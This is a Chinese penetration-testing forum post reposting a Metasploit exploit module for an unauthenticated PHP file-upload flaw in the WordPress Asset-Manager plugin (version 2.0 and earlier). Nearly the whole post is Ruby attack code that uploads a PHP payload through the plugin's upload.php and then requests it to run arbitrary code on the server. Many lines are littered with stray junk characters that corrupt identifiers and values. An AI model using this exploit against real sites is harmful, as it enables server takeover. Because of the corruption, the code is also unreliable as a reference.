找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
返回列表 发新帖
查看: 2409|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。8 \0 _4 H+ k6 j7 [  }9 [6 R
0 k/ W7 F5 D9 p, |
##
/ s. i$ {4 F1 r- c% g* s# This file is part of the Metasploit Framework and may be subject to8 l8 @3 j/ M2 I6 ]
# redistribution and commercial restrictions. Please see the Metasploit) R7 L: ~4 r8 @- [) {) v/ {
# Framework web site for more information on licensing and terms of use.1 A5 s" l, k6 N9 _. L
#   http://metasploit.com/framework/
# M6 y8 e  J4 b7 ]##4 Q, w, W( V% Q
( \3 P; ?( \0 p6 L
require 'msf/core'
% n( B8 R' G8 X7 ]require 'msf/core/exploit/php_exe'- r5 X* g4 _* V7 l9 y
: y, `2 }% O1 d0 O7 V6 m
class Metasploit3 < Msf::Exploit::Remote- o( a9 Z% m, y; m
  Rank = ExcellentRanking
  Z/ A  T- g; X9 @$ z' |7 o. R4 v " o5 y* x5 |% q0 B/ U
  include Msf::Exploit::Remote::HttpClient
! N) A7 J6 {* P$ K2 q  include Msf::Exploit:hpEXE! r1 D& h: d9 Y  T
7 h+ |& T; l* A. v9 K6 ]  T
  def initialize(info = {})6 g4 \. P# _1 i2 `# k# |" T6 y- c
    super(update_info(info,
; G7 v7 X, J: m  b6 g2 g9 O      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
2 H' v% b. j1 @( b1 V- n3 j      'Description'    => %q{
1 M% D9 O) A8 @        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress# I0 `2 B8 }6 T
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a/ K0 ~! F# B/ K( t& L( q- d
        temp directory without authentication, which results in arbitrary code execution.0 ]7 L2 K5 b! u1 r
      },: a6 m" ~( X2 N0 I' B. ?& ?) [
      'Author'         =>
* n2 A; a3 [" z* n3 o' n: u: }9 r2 U        [
/ Y) C/ V8 ^$ ]2 W8 b9 f          'Sammy FORGIT', # initial discovery) Y+ Y5 C. Y3 k% u. Y0 p+ |; @
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
: H0 ^% B2 R6 R6 G! f        ],% T* C6 J/ H, ]) P
      'License'        => MSF_LICENSE,' x. J( u5 h$ K# Z2 E
      'References'     =>
* D* Q' A9 S" {8 w& W1 P. ]( p        [" j5 W4 u' n3 R0 u; w! n+ C
          [ 'OSVDB', '82653' ],2 r4 D5 _( z- L3 R/ c) J& S5 }
          [ 'BID', '53809' ],
& c# r/ X) }# M6 A          [ 'EDB', '18993' ],
! I0 g) {% F+ I4 H7 h# ]' f3 B          [ 'URL', 'http:// www.myhack58.com /' ]8 ]+ `5 g9 {& W2 ^$ V2 K1 k! _- Y- c
        ],
  I7 N3 _4 X1 c      'Payload'       =>& Y9 |- b7 V. b
        {$ z5 S7 b+ E* |4 T2 X
          'BadChars' => "\x00",
8 H: G! p/ p- A8 g$ M        },
2 G7 e7 L1 t  Z- I( G  p      'Platform'       => 'php',
- Y7 C/ R. ~1 F3 o0 _      'Arch'           => ARCH_PHP,5 i2 O4 [( [0 Q6 q/ {' P: z1 m5 x
      'Targets'        =># @6 r- c2 Q; ]1 y# b/ J
        [
4 Y- Q! D" T% v7 K          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],4 o6 b* M- ^" ~- q: l
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]' ], }/ M7 {3 W5 Q0 p
        ],
4 [6 ~6 [: o8 u$ R& Y/ ~9 J      'DefaultTarget' => 0,2 @" p" P1 B8 C) a: q" b/ _+ X
      'DisclosureDate' => 'May 26 2012'))$ [9 Q( ~5 E+ q/ l) b1 S  \

' x5 B8 c( ]$ m  J/ b    register_options($ Q: M5 ?; E0 o( f8 V
      [8 n5 Z# R( g7 ^6 e' a) _: }
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
0 i: a1 S0 _: c1 G# K* Z: N      ], self.class)
4 d6 l4 L2 f7 U" v# k! P  end
; Q' @$ j& J' M. ] 6 c8 C% F, J, F; p
  def exploit8 Y; F! f, g+ V( t" r( M
    uri =  target_uri.path
3 g; G; `* t' z    uri << '/' if uri[-1,1] != '/'
1 l) I5 W4 L( S( e    peer = "#{rhost}:#{rport}"; B% A& A4 F! T7 H! k3 W1 e
    payload_name = "#{rand_text_alpha(5)}.php"2 b# J0 \; N7 _' O/ V& f$ Y7 Y, N+ q4 |
    php_payload = get_write_exec_payload(:unlink_self=>true)9 ]% M" _6 w9 u3 I/ s
# z# s# ?6 L: [% D: h
    data = Rex::MIME::Message.new3 Z  @6 F- N8 W+ p" W% ?
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
% N2 W% \$ ?' I    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')- Y7 o. L. s2 w3 Q/ t/ n5 h
6 J( E& {- x/ E% q0 D4 p
    print_status("#{peer} - Uploading payload #{payload_name}")
, N+ p1 i$ p  Z  A) T) @6 R8 R    res = send_request_cgi({  g3 G+ L1 O5 K" P+ ~# L
      'method'  => 'POST',
3 O# A) C: a8 R' O3 @* e& X+ t      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
- U  Z5 b7 d+ T+ A( T      'ctype'   => "multipart/form-data; boundary=#{data.bound}",  s& J! y. y' o; k: M. X) M
      'data'    => post_data
! j* p+ n$ k# O4 W; C# `5 L; c    })" J0 r) O' q4 ]3 v, [9 ?& D0 O

8 V1 c+ n- p) j1 E' P! ^; q    if not res or res.code != 200 or res.body !~ /#{payload_name}/
# k! E' H9 j7 Z; n1 l0 D( c4 p- {3 b      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
$ R9 i- U( Y6 g- {0 B# _+ {6 G( dend& \' J1 y9 F6 x3 p  b

2 ^: S: ^* d! e4 D% y  {  T    print_status("#{peer} - Executing payload #{payload_name}")
3 |  x% t$ T- G9 O. o. p! e    res = send_request_raw({) `; S" G2 h* j
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
9 K9 ^8 O9 ^6 |      'method'  => 'GET'% u9 c+ W9 j5 V7 I: q. h
    })
3 G% {/ J2 K3 }8 x3 }! l0 }9 w9 n 1 t& t6 _2 w5 Y4 }% F! Y
    if res and res.code != 2005 S# L* ], `. B: r. Z3 h
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
- {4 i! E" d7 ?- u8 L- _) L    end; J" y& S* T1 F  E! }  D0 L& f5 {
  end8 C, W1 D7 a" }4 D
end/ [0 B- W( g# T! x# ]% w! Z+ t
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表